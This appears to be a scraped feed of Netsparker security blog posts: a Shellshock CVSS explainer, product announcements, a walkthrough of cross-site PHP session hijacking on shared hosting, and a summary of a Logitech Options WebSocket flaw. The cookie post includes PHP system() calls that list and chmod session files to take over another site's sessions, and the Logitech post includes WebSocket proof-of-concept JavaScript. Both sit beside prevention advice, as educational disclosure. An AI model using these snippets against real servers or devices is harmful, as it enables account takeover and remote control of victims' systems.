Before we begin, it’s useful to refresh our memories on what the vulnerability was. The Apache servers that worked in the CGI mode formed environment variables with the request header and stored the header variables in these environment variables.

Shellshock is a security bug that causes Bash to execute commands when setting environment variables unintentionally, if environment contains the bash command. In other words, if exploited, this vulnerability allows the attacker to remotely issue commands on the server. This is also known as a remote code execution.

Read more about the Shellshock vulnerability in our blogpost Shellshock Bash Remote Code Execution Vulnerability Explained and How to Detect It.

Attack Vector: Network

In this case, the vulnerability may be exploited by the attacker over the network. The vulnerable component in this attack is a web server.

Attack Complexity: Low

In this case, the vulnerability may be exploited with no additional skills. The attacker will exploit the vulnerability in every situation where the HTTP request can be edited manually. This is even possible with the built-in HTTP Request Builder of the browsers.

Privileges Required: None

The attacker does not need any privileges to exploit the vulnerability.

User Interaction: None

The vulnerability may be exploited without the need for a user interaction. The vulnerability may be exploited with a HTTP request crafted specifically for exploits.

Scope: Unchanged

Scope doesn’t change because the vulnerability is caused by Bash and all the impact is on the Bash shell.

Confidentiality, Integrity, and Availability Impact: High

Since the attacker can take full control over the system through Bash, the confidentiality, integrity, and availability is under high risk.

CVSS v3.0 Base Score: 9.8
CVSS v3.0 Vector String: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Netsparker and CVSS

Netsparker added CVSS to vulnerability reports in the version released in October 2016. Netsparker scores all the vulnerabilities it checks in the Base and Temporal metrics. The user can configure the Environmental metrics by adjusting the Report Policy settings. CVSS values, CVSS vectoral strings, and the severity scores are all listed in the reports, alongside the vulnerability classifications.

Authors, Netsparker Security Researchers:

Ziyahan Albeniz
Sven Morgenroth
Umran Yildirimkaya

--------------------

1 https://www.first.org/cvss/specification-document
2 Please view the Metric Values table.
3 https://www.first.org/cvss/use-design
4 https://www.cvedetails.com/cve-details.php?t=1&cve_id=2014-6271

Netsparker Announces New FogBugz Issue Synchronization Feature

$
0
0

Netsparker is pleased to announce a new integration solution for the Netsparker Enterprise product. You can now detect any status changes in your FogBugz (Manuscript) cases in Netsparker Enterprise and vice versa.

FogBugz Logo

What is FogBugz (Manuscript) Issue Synchronization?

Netsparker Enterprise already supports out of the box integration with FogBugz (Manuscript), as well as with other issue tracking systems. This means that you can now resolve and reactivate FogBugz (Manuscript) cases according to the scan results, in addition to automatic case creation, and detect any status changes FogBugz (Manuscript) cases opened by Netsparker Enterprise.

How FogBugz (Manuscript) Issue Synchronization Works

When Netsparker Enterprise issues are marked as Fixed, their counterparts in FogBugz (Manuscript) are automatically marked with the Resolved default status. Likewise, when Netsparker Enterprise issues are revived, their counterparts in Fogbugz (Manuscript) are marked with the Reactivated default status.

Netsparker Enterprises generates a Webhook URL after you save your integration settings. When you register this link as a webhook in your FogBugz (Manuscript) Project, Netsparker Enterprise will be able to detect changes in your FogBugz (Manuscript) cases.

For further information, see FogBugz (Manuscript) Issue Synchronization and Integrating Netsparker Enterprise with an Issue Tracking System.


Netsparker Announces New JIRA Issue Synchronization Feature

$
0
0

Netsparker is pleased to announce a new integration feature for the Netsparker Enterprise product. You can now detect any status changes in your Manuscript issues in Netsparker Enterprise and vice versa.

What is JIRA Issue Synchronization?

Netsparker Enterprise already supports out of the box integration with JIRA, as well as with other issue tracking systems. This means that you can now resolve and reopen JIRA issues according to the scan results, in addition to automatic issue creation, and detect any status changes in JIRA issues opened by Netsparker Enterprise.

How JIRA Issue Synchronization Works

When Netsparker Enterprise issues are marked as Fixed, their counterparts in JIRA are automatically marked with the Resolved user provided status. Likewise, when Netsparker Enterprise issues are revived, their counterparts in JIRA are marked with the Reopened user provided status.

Netsparker Enterprise generates a Webhook URL after you save your integration settings. When you register this link as a webhook in your JIRA Project, Netsparker Enterprise will be able to detect changes in your JIRA issues and compare them with the user-provided Reopen and Resolved statuses.

For further information, see JIRA Issue Synchronization and Integrating Netsparker Enterprise with an Issue Tracking System.

January 2019 Update for Netsparker Enterprise

$
0
0

We're delighted to announce a Netsparker Enterprise update. The highlights of this update are the addition of a new Application and Service Discovery feature, JIRA Issue Synchronization, FogBugz (Manuscript) Issue Synchronisation, GitLab CI Integration, Azure DevOps Integration, Support for Advanced Scheduling Scenarios, Jenkins Integration Script Generator for Pipeline Scripts, Support for Advanced Scheduling Scenarios and Security Check updates similar to those just released in Netsparker Standard 5.2.

This announcement highlights what is new and improved in this latest update.

Application and Service Discovery

As a Netsparker Enterprise customer, you may have many targets to scan. You may not even have a complete list of targets. This feature enables you to become aware of the full scope of your online collateral. Netsparker Enterprise will use several sources and methods (Rapid7’s sonar data and certificate transparency logs, for example) to discover additional, potential target applications and services.

For further information, see Application & Service Discovery.

Jira Issue Synchronization

Netsparker Enterprise now has out of box support for resolving and reactivating JIRA issues according to the scan results, in addition to automatic issue creation. Netsparker Enterprise also offers webhook support. This enables you to detect any status changes in JIRA issues opened by Netsparker Enterprise.

For further information, see JIRA Issue Synchronization.

FogBugz (Manuscript) Issue Synchronization

FogBugz Logo

Netsparker Enterprise now has out of box support for resolving and reactivating FogBugz (Manuscript) cases according to the scan results, in addition to automatic case creation. Netsparker Enterprise also offers webhook support. This enables you to detect any status changes in FogBugz (Manuscript) cases opened by Netsparker Enterprise.

For further information, see FogBugz (Manuscript) Issue Synchronization.

GitLab CI Integration

This integration enables you to integrate Netsparker Enterprise with GitLab. You will now be able generate and use cURL and Powershell scripts to enable Netsparker Enterprise’s advanced integration functionality. This means you can automatically trigger security scans in GitLab's CI/CD pipeline and benefit from SDLC features.

For further information, see Integrating Netsparker Enterprise with GitLab.

Azure DevOps Integration

This integration enables you to integrate Netsparker Enterprise with Azure Devops. You will be able generate and use cURL and Powershell scripts to enable Netsparker Enterprise’s advanced integration functionality. This means you can automatically trigger security scans in Azure DevOps' CI/CD pipeline and benefit from SDLC features(we can reference to SDLC document).

For further information, see Integration Netsparker Enterprise with Azure Pipelines.

Jenkins Integration Script Generator for Pipeline Scripts

Jenkins integration enables you to build automation into your projects. We have added an Integration Script Generator for the Pipeline Script to the Jenkins Integration window.

For further information, see Installing and Configuring the Netsparker Enterprise Jenkins Plugin.

Support for Advanced Scheduling Scenarios

This feature improves scheduling options on scheduled scans to support advanced scenarios. For example, it is now possible to configure recurring scans as bi-weekly or for the specified days. There have been many requests about this on our support tickets, so we are have responded to customer needs and provided these more advanced scheduling options.

For further information, see Scheduling Scans.

New Security Checks

We have added several new security checks to our Default Security Checks list in Scan Policies:

  • Added fourteen new kinds of Out-of-date version detection
  • Added a new pattern for CherryPy Version Disclosure and CherryPy Stack Trace Disclosure detection

For further information, see Scan Policies and our full list of Security Checks in our Web Application Vulnerabilities Index.

Further Information

For a complete list of what is new, improved and fixed in this update, refer to the Netsparker Enterprise changelog and Netsparker Standard changelog.

Cross Site Cookie Manipulation

$
0
0

For years, we’ve been told to keep the values of sensitive session cookies unpredictable and complex in order to prevent attacks such as session enumeration. And, it made sense. If the session ID is complex, long and cryptographically secure, it's almost impossible for an attacker to guess it.

Cross Site Cookie Manipulation

However, from time to time it's a good idea to look at recommended and widely followed security practices and ask yourself: "Is this actually the most secure way to do things?" and "Is it enough?". You'd be surprised how often the answer is no. In this blog post, we discuss the security of PHP's session cookies in a shared hosting environment, and explain why a cryptographically secure, random session ID is not enough to prevent attacks.

What Changed My Mind About Cookie Security

For years, I hadn't thought much about whether random session variable values were enough to protect against session cookie attacks. Then I read a blog post by a security professional, which focuses on a Russian hacker called Alexsey Belan who hacked dozens of sites including Yahoo!. The author, Chris McNab, describes Belan's techniques in great detail. Before Belan rose to questionable fame as one of the FBI's most wanted cyber criminals, McNab and his colleague, Mike Arpaia, were tasked with investigating a security breach. After the two spent a week analyzing the servers, and forensic artefacts left behind by the attacker, they came to the conclusion that a hacker called 'M4g' was responsible for the breach. As it turns out this was one of Belan's many online aliases.

The entire Alexsey's TTPs article is a must-read (link at the bottom), but it was one of descriptions of the many clever techniques he used that grabbed my attention:

Cookies from weak non-production instances (e.g. staging) were valid in production as cryptographic materials were the same — bypassing 2FA.

I suspect this means that he could authenticate to a less secure development instance of the live website as an administrative user, copy the cookie that was generated during authentication and use it to authenticate against the live production website. I can't decide whether this is an extremely clever trick or just bad software design! It's probably a little bit of both.

It got me thinking. The cookies were most likely cryptographically secure from the outside. The problem was that once he hacked a lower level target, namely the staging server, he could easily hack the production application, as they seemed to have shared the same secret. I was inspired to take this further and thought about an attack on PHP (and possible other languages or frameworks that stored session information in a similar way) if it ran on a shared host.

So why was I prompted to think about PHP and shared hosting environments? At this point, it would be useful to remind ourselves of how PHP handles cookies.

Cookies in Session Management

You may know that HTTP is a stateless protocol. It needs a mechanism like HTTP cookies in order to manage and differentiate users. Using cookies, servers can identify the users that make requests and grant them the necessary access.

As the name suggests, users have control over client-side technologies like browsers that store and send cookies. Therefore, instead of leaving sensitive data on browsers, where it can be read and modified, most developers – and PHP – leave a unique, identifiable key on the browser, and establish communication with the server using that key.

This is similar to what might happen when you visit a government agency. You show your ID to an employee, proving that you are the person you say you are. The employee knows he can safely talk to you about that unpaid parking ticket from three weeks ago, without giving out any sensitive information to an unintended recipient. But, while most people wouldn't have a problem with a stranger paying their parking tickets, the situation is clearly different when it comes to your personal email, online banking or social media accounts. This is why we have cookies, and why they do exactly what they are supposed to do, if used correctly.

In a similar way, whenever a user makes a request, a session ID is sent along with it. PHP finds the session related to this cookie and initializes a session object containing sensitive data, such as your email address or account balance, which allows the website to manage the user's session.

If you want to find out about PHP's session management, take a look at php.ini, PHP's main configuration file. By default, the name of the cookie that holds the session ID is called PHPSESSID, as illustrated.

You can also see where the sessions are saved by looking at the session.save_path configuration option.

How the Session Management Feature Initializes in PHP

PHP won't start a new session by default. Instead, the developer needs to call session_start in order for PHP to read the PHPSESSID cookie content and initialize the session with its value. However, there is also a php.ini configuration option called session.auto_start, which will enable cookie initialization automatically. But this option is not activated by default. To enable this session management feature, you have to call the session_start function. When using the default configuration, as seen above, this function call has the following effect.

  1. PHP tries to find a session file in the /var/lib/php5 directory. The name that the filename contains is the value of the PHPSESSID cookie. If it finds the file, PHP initializes an array and puts it into the super global $_SESSION variable.
  2. If the file does not exist, it creates a new one. The filename consists of the prefix sess_ and the value in the PHPSESSID cookie.

This is how information is stored in session files:

<?php
session_start();
if(authenticate($user, $pass)) {
$_SESSION["loggedIn"] = "yes";
$_SESSION["last_login"] = date("Y-m-d H:i:s");
} else {
echo "Try again!";
}

For this code, the information highlighted below was written to the file. Here is the output of the session file.

For a more readable output, you can use this code:

<?php
session_start();
var_dump($_SESSION);

This is the output of the code above:

array(2) { ["loggedIn"]=> string(3) "yes" ["last_login"]=> string(19) "2016-02-19 13:48:20" }

The Attack on Cookies in Shared Hosting Websites

Let's see how we can attack this issue in a shared hosting environment. In this example, there are two sites: fvvitter.com and qoogie.com. The first website, fvvitter.com, is under my control; qoogie.com belongs to someone else. But, both websites are on the same server because of shared hosting.

I began to investigate which session files are saved to which directory and what permissions are needed to access them.

<?php
system("ls -ld /var/lib/php5");

I immediately gained access to the names of the session files in the directory. You may remember that the filenames contained the actual session ID. That means I could create a cookie called PHPSESSID, put the ID from one of the filenames into the cookie, and visit qoogie.com. This was enough for me to take over the account of the person that owned this ID.

However, mere luck may not always be sufficient. On other shared hosting websites, you may run into strict directory permissions which don't even let you list the items within the directory. That doesn’t necessarily mean you can’t proceed. Even though you cannot access the list of items in the directory, you can still take over an account. This is how I was able to do that.

Both qoogie.com and fvvitter.com run on the same system. Let's say an online shop like Opencart is installed on each domain. That means they use same session structure, or in other words, they would save the same values with the same name inside the session array in order to check if a user is authenticated.

If I can manage to login into fvvitter.com's Opencart instance as an administrator, I can use the same cookie on qoogie.com.

The strict permissions were in my way again, as qoogie.com couldn't access the session file that my Opencart instance generated. That didn't matter though, since I owned the file, and I could give everyone read and write permissions.

Here’s the code to make the appropriate changes, if the session ID was a92q1u6m6grgeco1glv8eip8i3:

<?php
system("chmod 777 /var/lib/php5/sess_a92q1u6m6grgeco1glv8eip8i3");
// check permissions
system("ls -ld  /var/lib/php5/sess_a92q1u6m6grgeco1glv8eip8i3");

This did the trick. When I tried to load qoogie.com using fvvitter.com's cookie, I was able to manipulate session handling of the site and bypass the necessary authentication.

How to Prevent Cross Site Cookie Manipulation

If you have multiple websites on your server, you need to prevent an attacker from reading the names of your session files. You can do this by setting the appropriate permissions. However, an attacker may still be able to use cookies generated by another website on the same server in order to take over an account. Therefore, it's important to store the session files in separate locations. You can use the session.save_path configuration option to select an appropriate folder.

Further Reading

Alexsey's TTP's
Cross Domain Cookie Manipulation 1 (Video)
Cross Domain Cookie Manipulation 2 (Video)

Remote Hardware Takeover via Vulnerable Admin Software

$
0
0

Increased digitization means that web browsers are integral to our daily lives. For example, I’m writing this article on a cloud-based word processing application, whereas a few years ago, I may only have had the option of using an executable desktop application. This growing capability means that the web will be a part of a broader attack scope in upcoming years. It’s safe to say that web security is no longer confined to web applications.

Taking Remote Control of Computer Hardware

A few weeks ago, we published a blog post about the study of researchers from Princeton and UC Berkeley on web based attacks, Discovering and Hacking IoT Devices Using Web-Based Attacks. This article focuses instead on new research on the potential vulnerabilities in web-based device configuration interfaces.

Taking Remote Control of Computer Hardware

This week, we explore a study conducted by Tavis Ormandy from Google Project Zero on taking control of users’ mice remotely through a websocket. In his research, Ormandy discovered that he had to download a 144MB program called Logitech Options in order to add a new function to his Logitech mouse. He realized that the program was copying itself to the Windows Registry directory HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run, and was set to run automatically when the computer started.

The program not only behaved as an electron application, but it also initiated a server. Since the Origin wasn’t checked during the handshake, connection to the websocket was possible from any website that the user visited.

x = new WebSocket("ws://localhost:10134");
x.onmessage = function(event) {console.log("message", event.data); };
x.onopen = function(event) { console.log("open", event); };

Discovering the Lack of a Control Mechanism

On further analysis of the program, Ormandy discovered that the program expected JSON data, yet there was no enforcing rule or control mechanism set for the data to be sent in JSON format. When an unexpected data point was received, the app crashed. Here’s an example of an unexpected string input:

socket.send(JSON.stringify({message_type: "tool_update", session_id: "00cd8431-8e8b-a7e0-8122-9aaf4d7c2a9b", tool_id: "hello", tool_options: "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" }))

Ormandy realized that tool_options expected an array value. He also found, in the Github repo of Logitech, that there was a communications protocol used by the program.

The only user authentication that the program used was a process id (pid) belonging to the user. At first sight, this might seem like a good precaution to take in order to slow down the attackers. However, Ormandy used a brute-force attack to bypass this precaution and obtained a valid pid to continue the process. After this authorization bypass, an attacker could configure anything and send commands.

WebSocket is one of the most important features of HTML5. Any website can make a WebSocket request to another resource. This request may include values stored in the browser, such as HTTP cookies. WebSocket Hijacking attacks abuse this feature in order to send and receive messages on behalf of the victim.

How to Prevent the Remote Control Attack

The most important part in all of this is that during the handshake – before a connection is established – the Origin value in the request isn’t taken into consideration. Tavis Ormandy suggests that Logitech could have whitelisted the origins and enforced the necessity of those Origin values in the WebSocket request.

Although HTTP and WebSocket are different protocols, the exact same necessity for control applies for HTTP too. Here’s an example of a request that initiates a websocket connection:

GET / HTTP/1.1
Host: localhost:10134
Connection: Upgrade
Sec-WebSocket-Version: 13
Origin: https://www.whitelist.me
Sec-WebSocket-Key: XXXXXXXXXXXXXXXXXXXXXXX

By checking the origin in this request, the websocket server can easily decide whether it should block the connection attempt or grant it.

Importance of the Content Security Policy Header

A way to make sure that your website isn't abused to carry out such an attack, is to implement a proper Content Security policy (CSP). First and foremost, it will block Cross-site Scripting (XSS), if implemented correctly. However, it also lets you define to which websockets a connection can be established from your website as seen below.

Content-Security-Policy: connect-src 'self' trusted-parter.com:8080;

However, please keep in mind that this will only prevent your own website from being abused for such an attack. An attacker could use any website for that matter, including his own. So fixing the vulnerability on the affected device is the only effective way to prevent the attack.

What's the Upshot?

The vulnerability reported by Ormandy on September 12 wasn’t given a proper response within Project Zero's default 90 days, by which they expect vendors to respond and fix the reported vulnerability. This is why he shared the vulnerability with the public. Soon after he did this, Logitech employees responded. Meanwhile, he suggests that you disable Logitech Options until this vulnerability is fixed.

For further information, see "Options" Craft WebSocket server has no authentication.

Netsparker Will Be Exhibiting at the RSA Conference 2019 in San Francisco

$
0
0

This year Netsparker will be exhibiting at the RSA Conference in San Francisco, USA. The event will be held from March 4 to 8 at the Moscone Center. This year's theme is, Better.

Netsparker Will Be Exhibiting at the RSA Conference 2019 in San Francisco

Join Us at Booth #5580 in the North Expo at RSA Conference 2019

Members of our team will be representing Netsparker at booth #5580 in the North Expo. We’ll be happy to chat with you and answer any questions you might have about automatically detecting vulnerabilities in your website and web applications.

Visit the RSA Conference website for a copy of the agenda and more information about the sessions and events.

We look forward to meeting you there!

Register for a Free Expo Plus Pass at RSA Conference 2019

Use the code XEU9NETSPRKR to register for a complimentary Expo Plus Pass.

Viewing all 1027 articles
Browse latest View live